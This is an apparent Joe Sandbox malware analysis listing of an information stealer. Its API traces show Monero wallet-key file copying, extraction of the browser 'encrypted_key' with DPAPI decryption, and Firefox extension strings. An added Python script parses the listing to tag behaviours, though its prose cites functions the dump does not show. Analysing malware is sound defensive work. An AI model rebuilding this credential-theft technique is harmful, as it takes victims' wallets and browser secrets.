                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: ea2f08be3164042fab3b70eec9839dbda2ef7c4b9dc4333b88de321d523df65d
                                      • Instruction ID: 558e8e452c54a89390e7ff62fd7d0644e1dcdd49cd74f52d0fbaaa80cc722705
                                      • Opcode Fuzzy Hash: ea2f08be3164042fab3b70eec9839dbda2ef7c4b9dc4333b88de321d523df65d
                                      • Instruction Fuzzy Hash: 0EE1B3729101289BCB15FBA4EDA2EEE733DBF64300F908559F51676091EF306A5CCB62
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0011D581
                                      • lstrlen.KERNEL32(00000000), ref: 0011D798
                                      • lstrlen.KERNEL32(00000000), ref: 0011D7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 0011D82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: ad5eaef72ff7d876e87389524a9f058978b9b4a7fcd746796e74b11df9f09681
                                      • Instruction ID: 559157c5f2705f5b4400de266ded813071235de5d7f2589ee82ef2ef31e41abb
                                      • Opcode Fuzzy Hash: ad5eaef72ff7d876e87389524a9f058978b9b4a7fcd746796e74b11df9f09681
                                      • Instruction Fuzzy Hash: C591F7729101189BCB15FBA4EDA2EEE733DAF74300F904569F51676091EF307A68CB62
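                                       The two functions above (and the ShellExecuteEx and chrome.dll functions earlier in this listing) are easier to read once the call lines are turned into per-function evidence. The Python below is an added triage example, not Joe Sandbox code and not code from the sample: it parses the plain-text "APIs" call lines and "String ID" lines exactly as printed in this report, keeps "Part of subcall function" entries separate from the function's own calls, and labels each function with what the evidence supports (the CopyFileA/DeleteFileA pair with a `\Monero\wallet.keys` path in reach, the LoadLibraryA of `C:\ProgramData\chrome.dll`, the GetModuleFileNameA/ShellExecuteEx/ExitProcess trio). The label names, the regular expressions and the embedded sample are this example's own; the sample lines are copied from the listing above.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# One call line, in either shape the report uses (with or without an argument
# list), optionally prefixed with "Part of subcall function XXXXXXXX:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# "• String ID: a$b$c": the strings the function references, '$'-separated.
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*?)\s*$")


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall: Optional[str]  # callee address when marked "Part of subcall function"


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)

    def direct_apis(self):
        """APIs the function calls itself, excluding reported subcalls."""
        return {c.api for c in self.calls if c.subcall is None}

    def texts(self):
        """All arguments and referenced strings, for path matching."""
        return [a for c in self.calls for a in c.args] + list(self.strings)


def parse_blocks(text):
    """Split the listing at each 'APIs' heading; collect calls and strings per function."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
        elif current is None:
            continue
        elif (m := CALL_RE.match(line)):
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.calls.append(Call(m.group("api"), m.group("module"), args, m.group("ref"), m.group("sub")))
        elif (m := STRING_RE.match(line)) and m.group("strings"):
            current.strings.extend(s for s in m.group("strings").split("$") if s)
    return blocks


def tag_behaviours(block):
    """Map one function's API and string evidence to coarse labels; each rule
    names the evidence it needs so the label can be checked against the lines."""
    tags, direct, texts = set(), block.direct_apis(), block.texts()
    # Copy a file, work on the copy, delete it: a staging pattern. The wallet
    # label is added only when a wallet path is actually present as evidence.
    if {"CopyFileA", "DeleteFileA"} <= direct:
        tags.add("file_copy_then_delete")
        if any("wallet.keys" in t for t in texts):
            tags.add("monero_wallet_keys_in_evidence")
    # A DLL loaded by absolute path from the world-writable ProgramData tree.
    if any(c.api.startswith("LoadLibrary") and any("\\ProgramData\\" in a for a in c.args)
           for c in block.calls):
        tags.add("dll_loaded_from_programdata")
    # Resolve own image path, hand off through ShellExecuteEx, then terminate.
    if {"GetModuleFileNameA", "ShellExecuteEx", "ExitProcess"} <= direct:
        tags.add("shellexecute_then_exit")
    # A heap buffer formatted with a "%dx%d" template (two integers joined by 'x').
    if "%dx%d" in block.strings and any(a.startswith("wsprintf") for a in direct):
        tags.add("wsprintf_dxd_format")
    return tags


def triage(text):
    """Behaviour labels per function block, in listing order."""
    return [tag_behaviours(b) for b in parse_blocks(text)]


# Constructed sample: three function blocks copied from this report's listing.
SAMPLE_REPORT = r"""
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00126903
  • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
• ShellExecuteEx.SHELL32(0000003C), ref: 001269C6
• ExitProcess.KERNEL32 ref: 001269F5
• API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
• String ID: <
APIs
• LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0011A098
• String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
APIs
  • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0011AA11
• lstrlen.KERNEL32(00000000,00000000), ref: 0011AB2F
• DeleteFileA.KERNEL32(00000000), ref: 0011AE73
• String ID:
"""

if __name__ == "__main__":
    for block, tags in zip(parse_blocks(SAMPLE_REPORT), triage(SAMPLE_REPORT)):
        print(sorted(block.direct_apis()), sorted(tags))
```

                                       Keeping subcall lines apart from the function's own calls matters here: the `\Monero\wallet.keys` argument reaches this listing through the shared string helper at 0012ACC0, which is why it also shows up under the ShellExecuteEx function. A path seen only in a subcall is weak evidence on its own; the wallet label is therefore attached only to functions that also copy and delete a file themselves.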
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: 919f20f67f15952651ed1a6e48c69024132702b8f95262400e37bf8d60c7aa70
                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: 4351B172600206AFEF2AEF54D881BBA77A4FF55710F28412DFA0586591E731EE41DF90
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0011A664
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocLocallstrcpy
                                      • String ID: @$v10$v20
                                      • API String ID: 2746078483-278772428
                                      • Opcode ID: 31797696746350179fda68a4e7f89c73c06382dbb740f260dbc6abf0e9c16b30
                                      • Instruction ID: 1457015b051c8c4d96d188ba14c756f838dc6f0009404c1e1552239f088b7dbe
                                      • Opcode Fuzzy Hash: 31797696746350179fda68a4e7f89c73c06382dbb740f260dbc6abf0e9c16b30
                                      • Instruction Fuzzy Hash: B6516F70A1020CEFDB18DFA4DD96FED77B6AF54300F808428F90A6B291EB706A45CB51
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 0011A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                        • Part of subcall function 0011A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                        • Part of subcall function 0011A110: LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                        • Part of subcall function 0011A110: ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                        • Part of subcall function 0011A110: LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                        • Part of subcall function 0011A110: CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                        • Part of subcall function 00128FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00128FE2
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00131678,00130D93), ref: 0011F64C
                                      • lstrlen.KERNEL32(00000000), ref: 0011F66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: b6ce01dbc421c82c60dcbdc276740582bbb9ae9f028bc1a18e2f41b4359930de
                                      • Instruction ID: 8f7af6901672152dffbcb68674b6410a30ace59333773a6f2bf9e0bc6b537701
                                      • Opcode Fuzzy Hash: b6ce01dbc421c82c60dcbdc276740582bbb9ae9f028bc1a18e2f41b4359930de
                                      • Instruction Fuzzy Hash: 8751F371D101189BCB04FBF4EDA6DED7379AF64300F808968F91667191EF346A18CB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: cb538519111debf987dee31d78a30044fbd10fa07c837767889cead12634d231
                                      • Instruction ID: 180490e915b978f5d34b50dcc39fb7036c7656724b9feaf681ad73b1a5ace56e
                                      • Opcode Fuzzy Hash: cb538519111debf987dee31d78a30044fbd10fa07c837767889cead12634d231
                                      • Instruction Fuzzy Hash: 47415171E001199FCF04EFE4E896AEEB778AF58304F408518F5167B290EB74AA55CFA1
                                      APIs
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00124E3A
                                      • lstrcat.KERNEL32(?,00E3E6A0), ref: 00124E58
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124B7C
                                        • Part of subcall function 00124B60: FindFirstFileA.KERNEL32(?,?), ref: 00124B93
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC4), ref: 00124BC1
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC8), ref: 00124BD7
                                        • Part of subcall function 00124B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00124DCD
                                        • Part of subcall function 00124B60: FindClose.KERNEL32(000000FF), ref: 00124DE2
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124C00
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,001308D3), ref: 00124C15
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124C32
                                        • Part of subcall function 00124B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00124C6E
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00E3F910), ref: 00124C9A
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00130FE0), ref: 00124CAC
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,?), ref: 00124CC0
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00130FE4), ref: 00124CD2
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,?), ref: 00124CE6
                                        • Part of subcall function 00124B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00124CFC
                                        • Part of subcall function 00124B60: DeleteFileA.KERNEL32(?), ref: 00124D81
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124C57
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: `$
                                      • API String ID: 2104210347-12876440
                                      • Opcode ID: 6deb13aa4fe840064d454561574e352db515ed503fb903d1f6559abe19390610
                                      • Instruction ID: 55fc590695ba58c305e540b2611dcdb03de618f8c669cbe4b50b4da29dc39faf
                                      • Opcode Fuzzy Hash: 6deb13aa4fe840064d454561574e352db515ed503fb903d1f6559abe19390610
                                      • Instruction Fuzzy Hash: 3841B8B76001086BC765F760FC93EEE733D9BE9340F404658B6465A185EF709AD88BD1
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0011A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                        • Part of subcall function 0011A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                        • Part of subcall function 0011A110: LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                        • Part of subcall function 0011A110: ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                        • Part of subcall function 0011A110: LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                        • Part of subcall function 0011A110: CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                        • Part of subcall function 00128FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00128FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0011A489
                                        • Part of subcall function 0011A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A23F
                                        • Part of subcall function 0011A210: LocalAlloc.KERNEL32(00000040,?,?,?,00114F3E,00000000,?), ref: 0011A251
                                        • Part of subcall function 0011A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A27A
                                        • Part of subcall function 0011A210: LocalFree.KERNEL32(?,?,?,?,00114F3E,00000000,?), ref: 0011A28F
                                        • Part of subcall function 0011A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0011A2D4
                                        • Part of subcall function 0011A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0011A2F3
                                        • Part of subcall function 0011A2B0: LocalFree.KERNEL32(?), ref: 0011A323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: 18da07ee6eb72c8be53a3c17e3846db60f91c40e6ef4c571d232a07f15f9fb0b
                                      • Instruction ID: f16864498edd29476cdd834bcc17befc991811b897954d5af742f3f76783ca21
                                      • Opcode Fuzzy Hash: 18da07ee6eb72c8be53a3c17e3846db60f91c40e6ef4c571d232a07f15f9fb0b
                                      • Instruction Fuzzy Hash: 143166B6D05109ABCF08DFD4ED45AEFB7B9BF58340F444528E901A7241E7349E44CB62
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001305BF), ref: 0012885A
                                      • Process32First.KERNEL32(?,00000128), ref: 0012886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00128883
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • CloseHandle.KERNEL32(?), ref: 001288F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 69e5732c01b243eb10eebcd8e394c438bb371f5ef832844804883ac6f74a8742
                                      • Instruction ID: ee3224303daecd8d961ddd19c0573352504670c16e92bd7a87306d3a5050cf08
                                      • Opcode Fuzzy Hash: 69e5732c01b243eb10eebcd8e394c438bb371f5ef832844804883ac6f74a8742
                                      • Instruction Fuzzy Hash: A4317E71901228ABCB25DF94EC51FEEB378FF54700F504599F10AA61A0EB306A54CFA1
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0018FE13
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0018FE2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction ID: 2c1c352df247a3e5fd5801c89220d09138e357d0281c171851d1a5950096bef8
                                      • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction Fuzzy Hash: 4F01D432109726FEFA3436745CC99673694EB117B5736433DF516801F2EF524D829640
                                      APIs
                                      • CreateFileA.KERNEL32(00123D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00123D3E,?), ref: 0012948C
                                      • GetFileSizeEx.KERNEL32(000000FF,00123D3E), ref: 001294A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 001294B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: 4a2d147b0639a9971c33b5c90bb8e34166d939edefe9e102043680b932bec1d2
                                      • Instruction ID: 1c6f09c5518692aa7589067bc855a04d88cbb90eea04c2eea659e3ef5cfdc68d
                                      • Opcode Fuzzy Hash: 4a2d147b0639a9971c33b5c90bb8e34166d939edefe9e102043680b932bec1d2
                                      • Instruction Fuzzy Hash: EFF04435E04348BBDB24DFB4EC89F5E77B9AB48714F10C654FA11AB1C0D774A6119B50
                                      APIs
                                      • __getptd.LIBCMT ref: 0012CA7E
                                        • Part of subcall function 0012C2A0: __amsg_exit.LIBCMT ref: 0012C2B0
                                      • __getptd.LIBCMT ref: 0012CA95
                                      • __amsg_exit.LIBCMT ref: 0012CAA3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0012CAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: 686272de927f9879300e9206ba5ac1dba56cde4a63b3137403268d8433db90c4
                                      • Instruction ID: 3ac53079b3edd5392bdbebaa20570b7e255316041bed5469647961020d8d8a3c
                                      • Opcode Fuzzy Hash: 686272de927f9879300e9206ba5ac1dba56cde4a63b3137403268d8433db90c4
                                      • Instruction Fuzzy Hash: AAF0B432948338DBD720FBB8B84374E33A0AF20720F110149F605A72D2FF2459A08BD6
